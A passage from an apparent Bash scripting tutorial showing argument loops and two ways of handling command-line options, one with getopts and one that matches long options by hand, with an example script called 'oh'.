done

This seems slightly nicer but maybe I’m overlooking something.

for N in $*; do
    echo "Processing $N"
done
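One caveat worth knowing with either loop: $* splits on whitespace, so arguments containing spaces fall apart, while quoted "$@" preserves each argument intact. A small sketch (count_args is a name invented here):

```shell
function count_args {
    local COUNT=0
    for A in "$@"; do            # Quoted "$@" keeps each argument whole.
        COUNT=$((COUNT+1))
    done
    echo "${COUNT}"
}
count_args one "two words" three   # Prints 3; unquoted $* would split into 4.
```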

Option Handling

This code shows two approaches to option handling. The first function uses getopts and is quite robust with single-letter options; it can handle things like ./oh -caALPHA -bBETA -- dog -dashedarg. The second strategy can’t easily do this, but it has the advantage of not using getopts at all and of matching any kind of option, long or short. This makes input like ./oh -b BETA --alpha ALPHA -c js c py possible. The caveat is that the input must have spaces separating the options from the option arguments (not -bBETA). If you need a custom option handling scheme which can do something like -long1dash=bash, it can probably be made to work by just replacing the = and looking for -long1dash. Another strategy, not implemented here, would be to look for long options in the option string, replace them with short options, and pass the result on to getopts as normal.

The variable PARGS contains the "program arguments" which are not options and not option arguments. In the long option case, this starts off as the same list as the original input and non-qualifying components are removed explicitly with unset. The approach shown here is also a decent example of modularity and good code organization.

Option Handling With getopts
# oh - Option Handling Examples - Chris X Edwards

function show_usage {
cat << EOUSAGE
Usage: $0 [-h] [-a alpha] [-b beta] [-c] <arguments>
       -h = usage message
       -a = set alpha value [default 'First']
       -b = set beta value [default not set]
       -c = set gamma flag [default not set]
EOUSAGE
} # End function: show_usage

function handle_options_getopts {
    # Option letters followed by ":" mean has an OPTARG.
    while getopts "a:b:ch" OPTION; do
        case ${OPTION} in
            a) ALPHA=${OPTARG};;
            b) readonly BETA=${OPTARG};;
            c) readonly GAMMA="true";;
            h) show_usage && exit 0;;
        esac
    done
    shift $((OPTIND - 1)) # Leave behind remaining arguments.
} # End function: handle_options_getopts

function handle_options_long {
    local ARGV=(${ARGS}) i j=0
    PARGS=( ${ARGV[@]} ) # Program arguments (not options or option arguments).
    for OPTION in ${ARGV[@]}; do
        i=${j} ; j=$((j+1)) # i indexes this word; j the word after it.
        case ${OPTION} in
            -a|--alpha) ALPHA=${ARGV[j]}; unset PARGS[$i] PARGS[$j];;
            -b|--beta) BETA=${ARGV[j]}; unset PARGS[$i] PARGS[$j];;
            -c|--gamma) GAMMA="True"; unset PARGS[$i];;
            -h|--help) show_usage && exit 0;;
        esac
    done
} # End function: handle_options_long

function display_options {
    [ "$ALPHA" ] && echo "Alpha is set to: $ALPHA"
    [ "$BETA" ] && echo "Beta is set to: $BETA"
    [ "$GAMMA" ] && echo "Gamma is set."
    echo -n "Arguments: "
    for OP in ${PARGS[@]} ; do echo -n "$OP " ; done
} # End function: display_options

readonly ARGS="$@"
ALPHA="DefaultValue"     # Set default value.
handle_options_getopts ${ARGS}
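To watch getopts work in isolation, here is a minimal standalone sketch; the option letters mirror the script above, and set -- just fakes a command line:

```shell
set -- -a hello -c file1 file2     # Pretend these were the script's arguments.
while getopts "a:c" OPT; do
    case ${OPT} in
        a) ALPHA=${OPTARG};;       # "a:" means -a takes an argument.
        c) GAMMA="true";;
    esac
done
shift $((OPTIND - 1))              # Discard the parsed options.
echo "ALPHA=${ALPHA} GAMMA=${GAMMA} remaining=$*"
```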